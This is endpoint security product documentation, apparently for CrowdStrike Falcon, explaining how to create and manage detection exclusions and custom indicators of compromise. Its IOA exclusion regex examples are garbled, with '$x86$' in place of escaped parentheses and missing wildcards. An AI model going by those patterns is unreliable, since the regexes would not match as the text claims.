Any file matching the exclusion pattern or signed by an excluded certificate won't be available for download in Endpoint security > Monitor > Quarantined files, and those files aren't uploaded to the CrowdStrike cloud for analysis.

The most common reason to create this type of exclusion is to prevent certain executable files from being uploaded to the CrowdStrike cloud. For example, you might want to prevent uploads of self-extracting archives containing design files from the group of hosts that includes your engineering department's workstations.

Uploading files to CrowdStrike is disabled by default. To enable it, go to Support and resources > General settings, click Quarantined files, and turn on Upload quarantined files.

Note: Files larger than 32 MB will not be uploaded to the CrowdStrike cloud.

IOA exclusions

Reduce false-positive detection alerts from IOAs by creating exclusions that stop behavioral IOA detections and preventions. You can create an IOA exclusion directly from a CrowdStrike-generated detection, or by duplicating and then modifying an existing IOA exclusion.

Most types of IOA detections can be excluded through the Falcon console. However, some types of detections (OverWatch detections, custom IOA detections, and some others) cannot be excluded.

Considerations for IOA exclusions

Most IOA exclusions, including runtime container drift detections, are created from within a detection, or by duplicating and then modifying an existing IOA exclusion. Container drift exclusions are managed from Cloud Security. For more info, see Create exclusions to allow expected container drift.

You can exclude most types of IOA detections. However, the following types of detections cannot be excluded:

OverWatch detections: For assistance with OverWatch detections, contact Support
Forced Address Space Layout Randomization (ASLR) bypass preventions
Forced Data Execution Protection (DEP) preventions
Heap Spray Preallocation preventions
A small set of internal detection types
Container drift events in containers protected by the Falcon Container sensor for Linux

In most cases, the Falcon console indicates whether you can exclude a specific IOA detection. If you want to exclude a detection that Falcon indicates cannot be excluded, open a Support case.

Sensor visibility exclusions

For trusted file paths that you want to exclude from sensor monitoring, sensor visibility exclusions minimize sensor event collection, and stop all associated detections and preventions.

Important: Use sensor visibility exclusions with extreme caution. Potential attacks and malware associated with excluded files are not recorded, detected, or prevented.

The most common reason to create a sensor visibility exclusion is to improve endpoint performance at the excluded file paths, where sensor event data collection might interfere with highly resource-sensitive tasks. When planning and configuring sensor visibility exclusions, balance performance and security considerations. We recommend using sensor visibility exclusions only on hosts for which the sensor’s performance overhead without exclusions is unacceptable, and we recommend choosing excluded paths with care.

Considerations for sensor visibility exclusions

Use sensor visibility exclusions with extreme caution. If you create a sensor visibility exclusion for a file path, Falcon won’t record all events, won’t report any detections, and won’t perform any prevention actions. On that file path, you won’t have visibility into potential attacks or malware.

When planning and configuring sensor visibility exclusions, balance performance and security considerations. We recommend using sensor visibility exclusions only on hosts for which the sensor’s performance overhead without exclusions is unacceptable, and we recommend choosing excluded paths with care.

Before creating sensor visibility exclusions, consider the potential security risks. If you do create sensor visibility exclusions, we recommend following these best practices:

Configure exclusions to be as narrow as possible. It’s safer to exclude a single executable file than an entire folder or all subfolders.
Avoid specifying file exclusions for built-in operating system executable files and folders, such as these:
- bash, /sbin, /bin, /usr/bin
- java, python, ruby

Additional sensor visibility exclusion considerations:

The sensor minimizes event reporting for process executions that match file exclusion criteria.
Processes that match file exclusion criteria no longer generate the majority of events that would be seen otherwise, including process-related events.
The sensor continues to send EndOfProcess events on Windows and macOS.
Process tree and file name are still captured, but SHA256 digest is not.
For excluded processes, data is not available in the following features and contexts:
- Any app usage dashboard (for example, in asset management)
- Hash search (Falcon Investigate)
- FDRv2 app info
Excluding container-relative paths (and more generally, paths inside a chroot) is not supported.
At this time, any Linux sensor visibility exclusions apply to both the host and all containers running on the system.

Plan your exclusions

Consider the potential implications of an exclusion before you put it into effect in your environment.

To maintain a strong security posture, create exclusions to be as specific as possible while meeting your exclusion needs. If your exclusion is too broad, you might inadvertently permit malicious activity that should be detected or blocked.

When you're creating or editing an IOA exclusion other than a container drift event exclusion, the Falcon console displays a list of affected detections before you save it. This list shows detections that wouldn’t have been generated if the current exclusion were live in your environment. Previewing detections that you would no longer see helps you quickly understand the expected effect of an exclusion before you save it.

For IOA exclusions that are already in effect in your environment, go to Endpoint security > Configure > Exclusions . Click IOA Exclusions, then See Activity to view a log of activity that would have triggered a detection if an IOA exclusion hadn’t been in place. Reviewing activity that’s being excluded helps you understand the actual effects of your IOA exclusions.

CrowdStrike automatically records all changes to your exclusions. Each exclusion type has its own audit log where you can view the revision history for exclusions of that type. We recommend that you include a comment for the audit log whenever you create, edit, or delete an exclusion. In the audit log comment, include any info that would help other people in your organization understand what you changed and why. For example, when creating or editing an exclusion, include info about what activity was excluded and why.

Note: Exclusion audit logs are retained for 90 days.

After you create, edit, or delete an exclusion, it can take up to 40 minutes for the changes to go into effect.

Manage machine learning exclusions

View machine learning exclusions

The Machine learning (file path) exclusions tab and Machine learning (certificate) exclusions tab are where you can view, create, edit, and delete ML exclusions, and where you can view the ML exclusion audit log. By default, the list of exclusions is sorted by Last modified.

Go to Endpoint security > Configure > Exclusions , and then go to the Machine learning (file path) exclusions or the Machine learning (certificate) exclusions tab.

Machine learning (file path) exclusions

Create machine learning (file path) exclusions from within a detection

Create a machine learning (file path) exclusion from within a detection. The exclusion pattern is pre-populated based on the detection. Verify or change the pattern as needed before saving the exclusion.

On Endpoint security > Monitor > Endpoint detections, for the machine learning detection that you want to create an exclusion from, click to expand the detection’s Summary.
From the Actions menu, click Create ML exclusion (file path).
In Create machine learning exclusion, search for the host groups that the exclusion will apply to or select All hosts, and then click Next.
In the Excluded from list, select the actions to apply to the selected host groups:
- Detections and preventions: Excludes files from ML-based detections and preventions.
- Uploads to CrowdStrike: Excludes files from being uploaded to the CrowdStrike cloud.
In the primary Exclusion pattern field, verify the prepopulated pattern value or enter a new pattern in glob syntax. For more info, see Glob Syntax.
Optional. Select the ancestor exclusion patterns toggle to reveal and edit parent or grandparent patterns. The toggle displays Include ancestor exclusion patterns by default and changes to Hiding ancestor exclusion patterns when disabled. Edit the exclusion pattern in glob syntax.
Optional. Under Pattern test value, test the exclusion pattern for each pattern type:
1. Type a file path, and then click Test pattern.
2. Check the confirmation message to see whether your test pattern matches the syntax.
Recommended. Enter a comment to include in the audit log.
Optional. If you want to add another exclusion pattern after you save this one, select Create another exclusion with these hosts after saving.
Click Create Exclusion.

Note: You must enable a new exclusion in order for it to take effect.

Create machine learning (file path) exclusions from the exclusions tab

Alternatively, you can create a machine learning exclusion on the Machine learning (file path) exclusions tab.

Go to Endpoint security > Configure > Exclusions, and then go to the Machine learning (file path) exclusions tab.
Click Create exclusion.
In Create machine learning exclusion, select the host groups that the exclusion will apply to or select All hosts, and then click Next.
In the Excluded from list, select the actions to apply to the selected host groups:
1. Detections and preventions: Excludes files from ML-based detections and preventions.
2. Uploads to CrowdStrike: Excludes files from being uploaded to the CrowdStrike cloud.
In the primary Exclusion pattern field, verify the pre-populated pattern value or enter a new pattern in glob syntax. For more info, see Glob Syntax.
Optional. Select the ancestor exclusion patterns toggle to reveal and edit parent or grandparent patterns. The toggle displays Include ancestor exclusion patterns by default and changes to Hiding ancestor exclusion patterns when disabled. Edit the exclusion pattern in glob syntax.
Optional. Under Pattern test value, test the exclusion pattern for each pattern type:
1. Type a file path, and then click Test pattern.
2. Check the confirmation message to see whether your test pattern matches the syntax.
Recommended. Enter a comment to include in the audit log.
Optional. If you want to add another exclusion pattern after you save this one, select Create another exclusion with these hosts after saving.
Click Create Exclusion.

Note: You must enable a new exclusion in order for it to take effect.

Edit machine learning (file path) exclusions

Modify an existing exclusion to stop ML-based detections and preventions, or to stop file uploads to the CrowdStrike cloud, for a trusted file path.

Go to Endpoint security > Configure > Exclusions , and then go to the Machine learning (file path) exclusions tab.
Click Open menu for the exclusion that you want to modify, and then click Edit.
In Edit machine learning exclusion, select Groups of hosts and add the groups that the exclusion will apply to, or select All hosts.
In the Excluded from list, select the actions to apply to the selected host groups:
- Detections and preventions: Excludes files from ML-based detections and preventions.
- Uploads to CrowdStrike: Excludes files from being uploaded to the CrowdStrike cloud.
In the Exclusion pattern field, enter an exclusion pattern in Glob Syntax.
Optional. Select the ancestor exclusion patterns toggle to reveal and edit parent or grandparent patterns. The toggle displays Include ancestor exclusion patterns by default and changes to Hiding ancestor exclusion patterns when disabled. Edit the exclusion pattern in glob syntax.
Recommended. Optionally, enter a comment to include in the audit log.
Optional. Under Pattern test value, test the exclusion pattern for each pattern type:
1. Type a file path, and then click Test pattern.
2. Check the confirmation message to see whether your test pattern matches the syntax.
Click Save.

Machine learning (certificate) exclusions

Create machine learning (certificate) exclusions from within a detection

Create a machine learning (certificate) exclusion from within a detection. Available exclusion certificates are pre-populated based on the detection.

On Endpoint security > Monitor > Endpoint detections, for the machine learning detection that you want to create an exclusion from, click to expand the detection’s Summary.
From the Actions menu, click Create ML exclusion (certificate).
In Create machine learning exclusion, select the host groups that the exclusion will apply to or select All hosts, and then click Next.
Note: For customers with Falcon Flight Control, choose the child CIDs that the exclusion will apply to.
In Select a certificate, select either Leaf certificates only or Full certificate chain to view the certificates available for exclusion.
In the Signature chain section, select the desired certificate.
Note: The certificate that you select must be trusted on the target endpoint.

Note: In most cases, only the leaf certificate should be used in order to keep the exclusion scope as narrow as possible.
Click Next.
Optional. Update the Description.
Recommended. Add a comment for the audit log.
Optional. Select Create another exclusion with these host groups after saving.
Click Create exclusion. Your new exclusion is displayed on the Machine learning (certificate) exclusions tab of the Exclusions page.

Notes:

You must enable a new exclusion in order for it to take effect.
On build servers, compiling executables and signing executables are two distinct actions. Detect on-Write (DoW) still detects compiled executables before they are signed, so false positives at this stage of the build pipeline still require file path-based ML exclusions.

Create machine learning (certificate) exclusions from the exclusions tab

Alternatively, you can create a machine learning exclusion on the Machine learning (certificate) exclusions tab.

Go to Endpoint security > Configure > Exclusions, and then go to the Machine learning (certificate) exclusions tab.
Click Create exclusion.
In Create machine learning exclusion, select Groups of hosts and add the host groups that the exclusion will apply to or select All hosts, and then click Next.
Note: For customers with Falcon Flight Control, choose the child CIDs for the exclusion to target.
Select a PE file or certificate to upload.
In Signature chain, select the PE file or certificate that you uploaded, and then click Next.
Recommended. Update the Description and add a comment for the audit log.
Click Create exclusion.

Notes:

You must enable a new exclusion in order for it to take effect.
To upload a certificate or file to the Falcon console for exclusions, your browser must have WebAssembly (Wasm) enabled. Most browsers should already have this enabled by default.
Supported certificate file formats for upload include .PEM and .CER.

Edit machine learning (certificate) exclusions

Modify an existing exclusion to stop ML-based detections and preventions, for a trusted certificate.

Go to Endpoint security > Configure > Exclusions, and then go to the Machine learning (certificate) exclusions tab.
Click Open menu for the exclusion that you want to modify, and then click Edit.
In Edit machine learning exclusion, select Groups of host and add the host group that the exclusion will apply to, or select All hosts.
Click Next.
Optional. Update the Description.
Recommended. Add a comment for the audit log.
Click Save.

Duplicate machine learning (certificate) exclusions

Go to Endpoint security > Configure > Exclusions, and then go to the Machine learning (certificate) exclusions tab.
Click Open menu for the exclusion that you want to duplicate, and then click Duplicate.
Edit the newly duplicated exclusion as needed.

Delete machine learning exclusions

Delete exclusions with caution. A deleted exclusion cannot be recovered.

Go to Endpoint security > Configure > Exclusions, and then go to the Machine learning (file path) exclusions tab or the Machine learning (certificate) exclusions tab.
Click Open menu for the exclusion that you want to delete, and then click Delete.
Recommended. Review any details about the exclusion to be deleted and enter a comment to include in the audit log.
Click Delete exclusion.

Export machine learning exclusions

Export a report for machine learning exclusions.

Go to Endpoint security > Configure > Exclusions, and then go to the Machine learning (file path) exclusions tab or the Machine learning (certificate) exclusions tab.
Click Export.
Select the desired file export format. Choose between CSV or JSON file types.
Download the exported files. Optionally, you can delete any exported files you no longer need.

Manage IOA exclusions

Add IOAs to your allowlist to reduce behavioral IOA detections and preventions. Most IOA exclusions are created from within CrowdStrike-generated IOA detections, or by duplicating and then modifying an existing IOA exclusion. Container drift exclusions are managed from Cloud Security. For more info, see Create exclusions to allow expected container drift.

View IOA exclusions

The IOA exclusions tab is where you can view, edit, duplicate, and delete IOA exclusions, and where you can view the IOA exclusion audit log and activity log.

By default, the list of exclusions is sorted by Last modified.

Go to Endpoint security > Configure > Exclusions, and then go to the IOA exclusions tab.

Create an IOA exclusion

There are two kinds of IOA exclusions:

Container drift exclusions, which are generated from Cloud security.
All other IOA exclusions, which are generated from Endpoint security.

To learn about creating container drift exclusions, see Create exclusions to allow expected container drift. For all other IOA exclusions, follow this procedure.

The Image filename and Command line primary exclusion pattern fields contain values from the originating detection.

If a suggested regex value would exceed the maximum 256 characters, the regex value is truncated to 256 characters and appended with .* to ensure that it matches any remaining characters. You can modify the suggested value, but the new value must not exceed 256 characters.
You can change the values displayed to accommodate your specific needs. For example, you might broaden the Image filename regular expression to encompass a wider set of file path variations. For more examples, see IOA exclusion regex examples.
The matching test string values are also prepopulated.

The Host Groups field is prepopulated with host data from the originating detection. You can modify the host group assignments to accommodate your specific needs.

On Endpoint security > Monitor > Endpoint detections, for the CrowdStrike-generated IOA detection that you want to create an exclusion from, click to expand the detection’s summary.
Click Create IOA exclusion.
Search for the host groups that the exclusion will apply to, or select All host groups.
Enter a name and a description for the exclusion. Descriptions are optional but are helpful if you’re managing a large number of exclusions.
Configure exclusion patterns as needed for the primary, parent, and grandparent processes.
1. For the primary process:
  1. Enter an exclusion pattern in regex format in the Image filename field. Depending on the exclusion, you can click Expand to see additional regex syntax suggestions.
  2. Optional. Test the image filename pattern against the original detection information.
  3. In the Command line field, enter a command line value in regex format.
  4. Optional. Test the command line pattern against the original detection information.
2. For parent or grandparent processes:
  1. Select the ancestor exclusion patterns toggle to reveal these options. The toggle displays Include ancestor exclusion patterns when enabled.
  2. Configure parent and grandparent patterns using the same fields as the primary process.
In the Image filename field, enter an exclusion pattern in regex format. Depending on the exclusion, you can click Expand to see additional regex syntax suggestions.
Optional. Test the image filename pattern against the original detection information.
In the Command line field, enter a command line value in regex format.
Optional. Test the command line pattern against the original detection information.
Recommended. Optionally, enter a comment for the audit log.
Click Next.
Carefully review the list of detections that wouldn’t have appeared and associated processes that would have been allowed to run if the exclusion were already in place.
Click Create exclusion.

Duplicate an IOA exclusion

Create an IOA exclusion by duplicating an existing IOA exclusion and then modifying the new exclusion’s settings. This method enables you to create IOA exclusions without needing to start from within an IOA detection.

The IOA Name value uniquely identifies the IOA pattern and can’t be changed.

Go to Endpoint security > Configure > Exclusions, and then go to the IOA exclusions tab.
Click Open menu for the exclusion that you want to copy, and then click Duplicate.

The fields in the new duplicated exclusion are prepopulated with values from the source exclusion.
Modify settings as described in Create an IOA exclusion.
Recommended. Optionally, enter a comment for the audit log.
Click Next.
Carefully review the list of detections that wouldn’t have appeared and associated processes that would have been allowed to run if the exclusion were already in place.
Click Create exclusion.

Tip: Container drift exclusions can also be managed from Cloud security > Rules and Policies > Policies > Container drift exclusions .

Edit an IOA exclusion

The IOA name value uniquely identifies the IOA pattern and can’t be changed.

Go to Endpoint security > Configure > Exclusions, and then go to the IOA exclusions tab.
Click Open menu for the exclusion that you want to modify, and then click Edit.
Modify settings as described in Create an IOA exclusion.
Recommended. Optionally, enter a comment for the audit log.
Click Next.
Carefully review the list of detections that wouldn’t have appeared and associated processes that would have been allowed to run if the updated exclusion were already in place.
Click Update.

Tip: Container drift exclusions can also be managed from Cloud security > Rules and Policies > Policies > Container drift exclusions .

Delete an IOA exclusion

Delete exclusions with caution. A deleted exclusion cannot be recovered.

Go to Endpoint security > Configure > Exclusions, and then go to the IOA exclusions tab.
In the Actions column for the exclusion that you want to delete, click Delete.
Review the list of changes that would apply if the exclusion were deleted.
Recommended. Optionally, enter a comment for the audit log.
Click Delete exclusion.

Tip: Container drift exclusions can also be managed from Cloud security > Rules and Policies > Policies > Container drift exclusions .

Export IOA exclusions

Export a report for IOA exclusions.

Go to Endpoint security > Configure > Exclusions, and then go to the IOA exclusions tab.
Click Export.
Select the desired file export format. Choose between CSV or JSON file types.
Download the exported files. Optionally, you can delete any exported files you no longer need.

Tip: Container drift exclusions can also be managed from Cloud security > Rules and Policies > Policies > Container drift exclusions .

View the IOA exclusions activity log

View a list of events that would have triggered detections if the exclusions hadn’t been in place.

Go to Endpoint security > Configure > Exclusions, and then go to the IOA exclusions tab.
Click See activity.
Sort columns to adjust your view of the log.
Click any event to see additional details.

View the IOA exclusions audit log

View the history of changes to your IOA exclusions.

Go to Endpoint security > Configure > Exclusions, and then go to the IOA exclusions tab.
Click See audit log.
Adjust your view by filtering or sorting the log entries.
Click any revision to see additional details.

IOA exclusion regex examples

For info about supported regular expression syntax in Falcon, see Create an IOA exclusion and Supported regex syntax.

This example broadens an image filename’s regex:

Description	Regex value
Detection’s image filename value	`\Device\HarddiskVolume2\Program Files (x86)\Tools\myTools1\bin\tool_v1.1.exe`
Prepopulated image filename regex	`.*\\Program Files $x86$\\Tools\\MyTools1\\bin\\tool_v1\.1\.exe`
Modified regex that captures filenames that contain version numbers consisting of one or more digits, for example, `tool_v1.1.exe` or `tool_v22.0001.exe`	`.*\\Program Files $x86$\\Tools\\MyTools1\\bin\\tool_v\d+\.\d+\.exe`
Modified regex that captures filenames containing any version number format, for example, `tool_vABC123.xyz_123.exe`	`.\\Program Files $x86$\\Tools\\MyTools1\\bin\\tool_v.\.exe`

This example broadens a command line’s regex:

Description	Regex value
Detection’s command line value	`"C:\Program Files (x86)\Tools\MyTools1\bin\tool_v1.1.exe" -classpath C:\Users\demo\AppData\Local\Temp\~spawn2818010883315786762.tmp.dir tool.Payload`
Prepopulated command line regex	`".\\Program Files $x86$\\Tools\\MyTools\\bin\\tool_v1.1\.exe" -classpath .\\Users\\demo\\AppData\\Local\\Temp\ \~spawn2818010883315786762\.tmp\.dir tool\.Payload`
Modified regex that covers any numerical variation in the number after “spawn”	`".\\Program Files $x86$\\Tools\\MyTools\\bin\\tool_v1.1\.exe" -classpath .\\Users\\demo\\AppData\\Local\\Temp\\~spawn\d+\.tmp\.dir tool\.Payload`

Manage sensor visibility exclusions

Use extreme caution and consider the potential security risks before creating sensor visibility exclusions. For more info, see Sensor visibility exclusions.

View sensor visibility exclusions

The Sensor visibility exclusions tab is where you can view, create, edit, and delete your sensor visibility exclusions, and where you can view the sensor visibility exclusion audit logs.

By default, the list of exclusions is sorted by Last modified.

Go to Endpoint security > Configure > Exclusions, and then go to the Sensor visibility exclusions tab.

Create sensor visibility exclusions

Create an exclusion to stop sensor visibility, detections, and preventions for a trusted file path.

Note: Use extreme caution and consider the potential security risks before creating sensor visibility exclusions. Malware or other attacks will not be recorded, detected, or prevented. For more info, see Sensor visibility exclusions.

Go to Endpoint security > Configure > Exclusions, and then go to the Sensor visibility exclusions tab.
Click Create exclusion.
In Create sensor visibility exclusion, select Groups of hosts and add the host groups that the exclusion will apply to, or select All hosts.
In the Exclusion pattern field, enter an exclusion pattern in Glob Syntax.
Optional. Under Pattern test, test the exclusion pattern:
1. Type a file path, and then click Test pattern.
2. Check the confirmation message to see whether your test pattern matches the syntax.
Recommended. Optionally, enter a comment to include in the audit log.
Optional. If you want to add another exclusion pattern after this one, select Create another exclusion with these hosts after saving.
Click Create exclusion, and then click Confirm and create.

Edit sensor visibility exclusions

Modify an existing sensor visibility exclusion.

Go to Endpoint security > Configure > Exclusions, and then go to the Sensor visibility exclusions tab.
Click Open menu for the exclusion that you want to modify, click Edit.
In Edit sensor visibility exclusion, select Groups of hosts and add the host groups that the exclusion will apply to, or select All hosts.
In the Exclusion pattern field, enter an exclusion pattern in Glob Syntax.
Optional. Under Pattern test, test the exclusion pattern:
1. Type a file path, and then click Test pattern.
2. Check the confirmation message to see whether your test pattern matches the syntax.
  
  Note: When editing a sensor visibility exclusion, if the original pattern includes a * then the pattern tester will be visible. If not, the pattern tester will not be present.
Recommended. Optionally, enter a comment to include in the audit log.
Optional. If you want to add another exclusion pattern after this one, select Create another exclusion with these hosts after saving.
Click Save, and then click Confirm and create.

Delete sensor visibility exclusions

Delete exclusions with caution. A deleted exclusion cannot be recovered.

Go to Endpoint security > Configure > Exclusions, and then go to the Sensor visibility exclusions tab.
Click Open menu for the exclusion that you want to delete, and then click Delete.
In Delete sensor visibility exclusion, review the list of changes that would apply if the exclusion were deleted.
Recommended. Optionally, enter a comment to include in the audit log.
Click Delete exclusion.

Export sensor visibility exclusions

Export a report for sensor visibility exclusions.

Go to Endpoint security > Configure > Exclusions, and then go to the Sensor visibility exclusions tab.
Click Export.
Select the desired file export format. Choose between CSV or JSON file types.
Download the exported files. Optionally, you can delete any exported files you no longer need.

View exclusions audit logs

View the history of changes to your exclusions.

Go to Endpoint security > Configure > Exclusions.
On the applicable exclusions tab, click See audit log.
Sort the columns to adjust your view of the log. In the Action column, logged revisions are defined as Created exclusion, Updated exclusion, or Deleted exclusion.
Click any revision for Audit log details.

Custom IOCs

Overview

Add your own custom indicators of compromise (IOCs) to gain visibility, while adding false positives to your allowlist and adding executables to your blocklist for a tailored environment.

Requirements

Subscriptions: Falcon Insight XDR or Falcon Prevent

Sensor support:

Falcon sensor for Windows, macOS, and Linux version 6.25 and later
Falcon sensor for Android version 2022.01.3110002 and later
Falcon sensor for iOS version 2022.01.1 and later

Roles:

These roles can add and manage custom IOCs:
- Falcon Administrator
- Detections Exceptions Manager
These roles can view custom IOCs and custom IOC audit logs:
- Falcon Analyst
- Falcon Analyst - Read Only
- Falcon Security Lead
- Falcon Investigator

Note: Falcon Container does not support custom IOCs for pods.

Understanding custom IOCs

Configure Falcon to observe custom IOCs in your environment and to specify what action the sensor takes when a matching IOC is observed on a host.

You can use custom IOCs to add false positive detections to your allowlist or to add applications to your blocklist to prevent their execution in your environment. It’s not necessary to upload lists of commodity malware or comprehensive lists of all known trusted files because Falcon already maintains comprehensive lists of those IOCs.

Falcon provides detection capabilities for several types of custom IOCs.

These IOCs are supported for Windows, Mac, and Linux:

Domain names
IPv4 addresses
IPv6 addresses
SHA-256 hashes
MD5 hashes

Note: MD5 hashes are not recommended because they’re undergoing industry deprecation and can be vulnerable to hash collisions.

These IOCs are supported for iOS and Android:

Domain names
Subdomains

Note: The subdomains IOC includes all subdomains of the specified domain. However, the domain itself is not included.
IPv4 addresses
IPv6 addresses

For more info about mobile IOCs, including considerations and IOC limits, see Managing custom IOCs for mobile devices.

Custom IOCs in multi-CID environments

When configuring custom IOCs, you have the option to apply IOCs to specific host groups or all hosts. If you use Falcon Flight Control and you apply an IOC to all hosts from the parent CID, the IOC is applied to all hosts across all CIDs in your environment.

Actions

For each indicator that you add, you specify an action that the sensor takes when it encounters that indicator on a host.

Supported actions vary by indicator type. Hash detections are supported in:

Windows: Portable Executable (PE) files or Microsoft Office macros
Mac: Mach Object (Mach-O) files
Linux: Executable and Linkable Format (ELF) files

Action	Description	Hashes	IP addresses	Domain names (includes subdomains for mobile devices)
Block	Add the indicator to your blocklist and show it as a detection. The file is completely removed from disk and is placed in the quarantine folder.	Yes	Yes (mobile devices only)	Yes (mobile devices only)
Block, hide detection	Block and detect the indicator, but hide it from Endpoint security > Monitor > Endpoint detections or Endpoint security > Monitor > Mobile detections . Discover this activity by searching for the indicator value in Investigate.	Yes	Yes (mobile devices only)	Yes (mobile devices only)
Detect only	Show the indicator as a detection and take no other action.	Yes	Yes	Yes
Allow	Add the indicator to your allowlist and do not detect it.	Yes	Yes (mobile devices only)	Yes (mobile devices only)
No Action	Save the indicator for future use but take no action.	Yes	Yes	Yes

Note: For unsupervised iOS devices, there might be limitations with the types of custom IOCs that can be applied to network connections, depending on your deployment. For more info, see Considerations with mobile IOCs.

Allow action

Hash-based allowlisting applies only to detections based on machine learning and detect-on-write. For info about adding IOA-based detections to your allowlist, see Exclusions.

Block action

Note: Hash-based blocklists take precedence over machine learning (ML) exclusions.

You assign a Block action to a hash using IOC Management. However, you must also enable the Custom Blocking setting for the blocking to actually happen. To enable this setting, go to Prevention Policies, find your policy and edit it so that in the Execution Blocking category, Custom Blocking is enabled.

You can control Execution Blocking independently through each prevention policy. However, you can assign custom IOCs to specific host groups.

Note: The block action for Office macro hashes is only supported for Office files detected and quarantined on write.

Custom IOC retrodetections

When indicators are uploaded for detection or blocking, the Falcon platform automatically searches historical Threat Graph data to see if any matches are found. If a match is found, a new detection is generated and captures the same context that a real-time detection includes. A detection found in historical data includes an additional section to indicate that it’s a retrospective detection, as opposed to a standard real-time detection. The retrospective look-back for custom IOCs in Threat Graph is effective up to your purchased data retention period.

$Retrospective detection details example$

Custom IOC audit log

CrowdStrike automatically records all changes to your custom IOCs in the custom IOC audit log. We recommend that you include a comment for the audit log whenever you add, edit, or delete a custom IOC. In the audit log comment, include any info that would help other people in your organization understand what you changed and why. For example, when adding a custom IOC, describe the indicator and explain why you added it.

Custom IOC tags

Apply one or more custom tags to your IOCs to help make your IOCs more maintainable and filterable. For example, you might use tags to link indicators to specific tickets, filter groups, or external sources.

Custom IOC tags apply to only the IOCs that you add and manage. They don’t apply to other Falcon features or settings.

Setup

Some setup required. If you want Falcon to observe custom IOCs in your environment, you must first upload the indicators and specify what action the sensor will take if the indicators are observed on hosts.

If you assign a Block action to a hash, you must also enable the Custom Blocking setting in Prevention Policies. This setting blocks any processes matching hashes that you add to your custom IOCs with a Block action. Configure Custom Blocking in Prevention Policies, in the Execution Blocking category.

Your CID can have up to 90,000 each of SHA256 and MD5 hashes per operating system, and up to 1 million total IOCs. Note that the previous size limit still applies to sensor versions earlier than 6.25, so only the most recently modified 12,000 indicators take effect for those sensors. Similarly, any indicators assigned to specific host groups don’t apply to sensor versions earlier than 6.25. For sensor versions earlier than 6.25, assign indicators to “all hosts” instead of to specific host groups.

Safeguards

As a safeguard, certain critical Windows operating system files cannot be added to your blocklist. Because not all OS executables are automatically safeguarded, we advise caution before attempting to add them to your blocklist.

Blocking hashes that are benign and executed often in your environment (for example, Windows operating system executables such as explorer.exe) can cause system instability or potentially catastrophic failures. During the process of adding custom IOCs, Falcon might display a warning before you add a known benign hash. However, we can’t guarantee that warnings will be generated for all critical hashes or prevent any resulting system instability. Additionally, Falcon displays a warning if you add a hash that already exists.

For hashes that Falcon displays warnings about, you can view more info in the custom IOC error reports. Custom IOC error reports are temporary and are generated only when indicators are added or edited.

Manage custom IOCs

View custom IOCs

The IOC Management page is where you can view, add, edit, export, and delete custom IOCs, and where you can view the custom IOC audit log.

Go to Endpoint security > Configure > IOC management .

Add custom IOCs

IOCs require certain metadata, and can include additional optional metadata. The Falcon console provides 2 methods for adding IOCs and IOC metadata:

Manually specify IOC metadata values while adding IOCs. For more info, see Add custom IOCs without metadata.
Import a file that already contains IOCs and their metadata values. This can be useful for importing previously exported IOCs that contain metadata, or for associating metadata to IOCs offline. For more info, see Import custom IOCs with metadata.

Add custom IOCs without metadata

Use this method to add one or more indicators without metadata. For info about importing indicators with metadata, see Import custom IOCs with metadata.

Note: Alternatively, you can quickly add a custom IOC from a detection summary panel when endpoint monitoring.

You must add each type of indicator (hash, domain name, or IP address) separately. However, you can add multiple indicators of the same type in a single operation.

If you bulk-add a batch of indicators, your selected settings apply to all indicators in the batch. You can modify settings for a specific indicator later by editing just that individual indicator. For more info, see Edit custom IOCs.

The specific settings available vary by indicator type.

Go to Endpoint security > Configure > IOC management , click Open menu , and then select one of these options:
- Add hashes
- Add domains
- Add IP addresses
Click one of these options:
- Upload: Upload a JSON or CSV file without metadata. For more info, see Format guidelines to add custom IOCs.
- Manually add: Add indicators manually. Separate multiple indicators with commas or line breaks. For more info, see Format guidelines to add custom IOCs.
Enter a descriptive comment about the indicators.
Configure indicator settings as described in Custom IOC configuration fields.
(Recommended) Enter a comment to include in the audit log.
Click Add.
Optional. Review any errors that were reported.

Note: IOC error reports are temporary and are generated only when indicators are added or edited.
If you specified a Block action for hashes, ensure that Custom Blocking is enabled on the Prevention Policies page.

Import custom IOCs with metadata

Bulk-import custom IOCs with metadata, and specify the action to take when the sensor observes the indicators on hosts. For info about adding indicators without metadata, see Add custom IOCs without metadata.

You can import any combination of indicator types (hashes, domains, subdomains, or IP addresses) with metadata in a single CSV or JSON file. For file formatting guidelines, see Format guidelines to add custom IOCs.

Go to Endpoint security > Configure > IOC management , click Open menu , and then select Import with metadata.
Select the file that you want to upload.
(Recommended) Enter a comment to include in the audit log.
Click Import.
Optional. Review any errors that were reported.

Note: IOC error reports are temporary and are generated only when indicators are added or edited.
If you specified a Block action for hashes, ensure that Custom Blocking is enabled on the Prevention Policies page.

Edit custom IOCs

If you bulk-edit a batch of indicators, your selected settings apply to all indicators in the batch.

Any changes that you make to an individual indicator are applied to only that indicator, and not to any other indicators that were originally added in the same batch.

The specific settings available vary by indicator type.

Note: Certain metadata values can’t be modified.

Go to Endpoint security > Configure > IOC management .
Filter the results as needed, select the checkboxes for the indicators that you want to edit, and then click Edit selected indicators.
Modify settings as described in Custom IOC configuration fields.
If you’re editing multiple types of indicators, click Next to modify the settings for each additional indicator type.
(Recommended) Enter a comment to include in the audit log.
Click Update indicators.
Optional. Review any errors that were reported.

Note: IOC error reports are temporary and are generated only when indicators are added or edited.
If you specified a Block action for hashes, ensure that Custom Blocking is enabled on the Prevention Policies page.

Delete custom IOCs

Delete one or more indicators. After you delete a custom IOC, the Falcon console no longer displays future detections for that indicator in Endpoint security > Monitor > Endpoint detections .

Go to Endpoint security > Configure > IOC management .
Select the checkboxes for the indicators that you want to delete, and then click Delete selected indicators.
(Recommended) Enter a comment to include in the audit log.
Click Delete indicators.

Export custom IOCs

Export a list of indicators in CSV or JSON format.

Go to Endpoint security > Configure > IOC management . A full list of your custom IOCs appears.
Refine the list of results as needed. For more info, see Viewing custom IOCs.
Click Export , and then click either CSV or JSON. Falcon prepares the file for download.

Note: The file preparation process can take up to 15 minutes to complete.
Click Download.

View custom IOCs

View all of your indicators, or refine the results through sorting, filtering, searching by keyword, or specifying which columns are visible. For info about exporting your filtered results, see Export custom IOCs.

The Last seen value indicates when the IOC was last detected executing in your environment and is effective up to your purchased data retention period. If the Last seen value is blank, the date is either beyond your purchased data retention period or an IOC hasn't been detected during the current retention period.

For IOCs that CrowdStrike migrated on behalf of customers before the deployment of the new IOC Management feature, the username shown is [email protected].

Go to Endpoint security > Configure > IOC management . A full list of your custom IOCs appears.
Refine the list of results as needed:
- Apply filters:
